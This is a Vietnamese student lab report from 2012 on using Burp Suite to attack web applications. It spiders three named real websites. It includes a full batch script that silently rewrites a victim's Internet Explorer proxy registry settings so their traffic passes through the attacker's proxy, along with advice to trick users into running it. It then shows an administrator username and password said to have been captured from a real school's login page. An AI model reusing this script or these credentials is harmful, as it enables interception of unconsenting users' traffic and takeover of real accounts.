SỬ DỤNG BURPSUITE TẤN CÔNG VÀO ỨNG DỤNG WEB I. Giới thiệu BURPSUITE BURPSUITE là một công cụ hiệu quả để tấn công vào các ứng dụng web. Sử dụng BURPSUITE để liệt kê các chức năng, phân tích các nguy cơ tiềm ẩn, khám phá các lỗ hổng, chèn các mã lệnh. BURPSUITE dùng các công cụ, tính năng như: Spider: Nhện bò loang Duyệt , liệt kê các chức năng, danh mục; Intruder: Dùng để tấn công, chèn mã lệnh Repeater: Lặp lại các cuộc tấn công đến một host Bạn có thể download phiên bản BurpSuite free edition v1.4.01 tại đây: http:portswigger.netburpdownload.html
Trang 1ĐẠI HỌC QUỐC GIA HÀ NỘI
TRƯỜNG ĐẠI HỌC CÔNG NGHỆ
-BÁO CÁO THỰC HÀNH MÔN HỌC
AN NINH MẠNG
Học viên: Nguyễn Minh Hướng
Lớp: K17 MMT Giáo viên: TS Nguyễn Đại Thọ
Hà Nội - 2012
Trang 2SỬ DỤNG BURPSUITE TẤN CÔNG VÀO ỨNG DỤNG WEB
I Giới thiệu BURPSUITE
BURPSUITE là một công cụ hiệu quả để tấn công vào các ứng dụng web Sử dụng BURPSUITE để liệt kê các chức năng, phân tích các nguy cơ tiềm ẩn, khám phá các lỗ hổng, chèn các mã lệnh
BURPSUITE dùng các công cụ, tính năng như:
Spider: Nhện bò loang -Duyệt , liệt kê các chức năng, danh mục;
Intruder: Dùng để tấn công, chèn mã lệnh
Repeater: Lặp lại các cuộc tấn công đến một host
Bạn có thể download phiên bản BurpSuite free edition v1.4.01 tại đây:
http://portswigger.net/burp/download.html
Trang 3Lưu thư mục tai ổ C:\ và giải nén , ta có các tệp
Chú
ý:
Burp Suite đòi hỏi một môi trường chạy Java Nó đòi hỏi phiên bản Java tối thiểu 1.5 Bạn có thể download Java tại địa chỉ miễn phí:
http://www.oracle.com/technetwork/java/javase/downloads/index
Kích chuột vào Suite.bat để chạy chương trình
Cửa sổ giao diện của BurpSuite:
Trang 4Cấu
hình
sử
dụng BurpSuite
1 Với trình duyệt IE
Trong Internet Explorer, chọn Tools -> Internet Options -> Connections ->LAN
settings
Đảm bảo “Automatically detect settings” và “Use automatic confi guration script” không đánh dấu kiểm Đảm bảo “Use a proxy server for your LAN” có đáng dấu kiểm Tại Address đáng địa chỉ 127.0.0.1 và Port là 80 Vào Advanced, đánh dấu mục
“Use the same proxy server for all protocols” box is checked
Trang 52 Với trình duyệt Google Chrome
Ta thiết lập Options -> Under the Bonnet -> Network ->
Change Proxy Settings
III Dùng BurpSuite để tấn công ứng dụng web
1 Liệt kê các chức năng, danh mục và phân tích
Tại ô Host ta gõ lần lượt 3 địa chỉ mà ta muốn xét:
c3ngochoi.edu.vn (web site trường THPT Ngọc Hồi)
http://hanoi.edu.vn/ (web site Sở GDĐT Hà Nôi)
http://hchomecenter.com.vn/ (website trung tâm siêu thị HC)
Tại mỗi đi chỉ ta kích chuột vào Go và ghi chép lại các kết quả:
Trang 6Kết quả thu được khi vào trang http://c3ngochoi.edu.vn/
Trang 7Kết quả thu được khi vào trang http://hanoi.edu.vn/
Kết quả thu được khi vào trang http://hchomecenter.com.vn/
2 Giả mạo
Proxy, lấy mật khẩu
Trang 8a Thiết lập proxy cho người dùng
- Để toàn bộ nội dung người dùng truy cập web đi qua Intercept Proxy thì cần phải thiết lập proxy trên trình duyệt của người dùng
- Hướng người dùng chạy một file.exe thiết lập proxy
Tạo ra một file.bat với nội dung:
Code:
echo Windows Registry Editor Version 5.00 > 1
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] >2 echo "MigrateProxy"=dword:00000001 > 3
echo "ProxyEnable"=dword:00000001 > 4
echo "ProxyHttp1.1"=dword:00000000 > 5
echo "ProxyServer"="IP:port" > 6
echo "ProxyOverride"="<local>" > 7
copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg
del 1 /f /q
del 2 /f /q
del 3 /f /q
del 4 /f /q
del 5 /f /q
del 6 /f /q
del 7 /f /q
regedit.exe /s b.reg
del b.reg /f /q
- Đặt tên file bất kỳ, ví dụ là just.bat
- Khi người dùng nhấn vào file này sẽ tự động thiết lập proxy cho IE với địa chỉ IP mà ta đã thiết lập, Port là port của Proxy sử dụng
Chuyển sang tab Intercept để cấu hình các mode hoạt động của Intercepting proxy
- Chế độ Intercept on: đây là chế độ hoạt động Nếu một người đặt máy tính này làm proxy thì toàn bộ quá trình truy cập ra internet đều bị proxy này quản lý Khi một
Trang 9request từ trình duyệt tới Proxy, nó sẽ phát hiện nội dung có thể chỉnh sửa và forward đi thì mới tới máy chủ web
Để chế độ này để lưu lại các thông tin người dùng truy cập web
Mở web site http://c3ngochoi.edu.vn/login.asp
Đăng nhập user và password truy nhập
Trang 10b Vào Proxy tìm thông tin Username và Password
- Vào Burpsuite Chuyển sang tab “Target” à Chọn Site Map
Lựa chọn trang web http://c3ngochoi.edu.vn/login.asp
Nhìn chuyển sang bên phải chọn “Request” (thông tin gửi lên server) vào mục Raw chúng ta sẽ thấy thông tin Username và Password
Trang 11Sau khi thực hiện các bước, ta đã lấy được tài khoản người quản trị với:
User: admin
Password: 300378
III Lời tựa
Do bản Burp suite free edition là bản dùng thử, còn hạn chế bởi các chức năng và công
cụ Dẫn đến nhiều sự hạn chế thực hiện các thao tác Tuy nhiên nó cũng là công cụ hữu ích cho việc phát hiện các lỗ hổng, phân tích các nguy cơ tiềm ẩn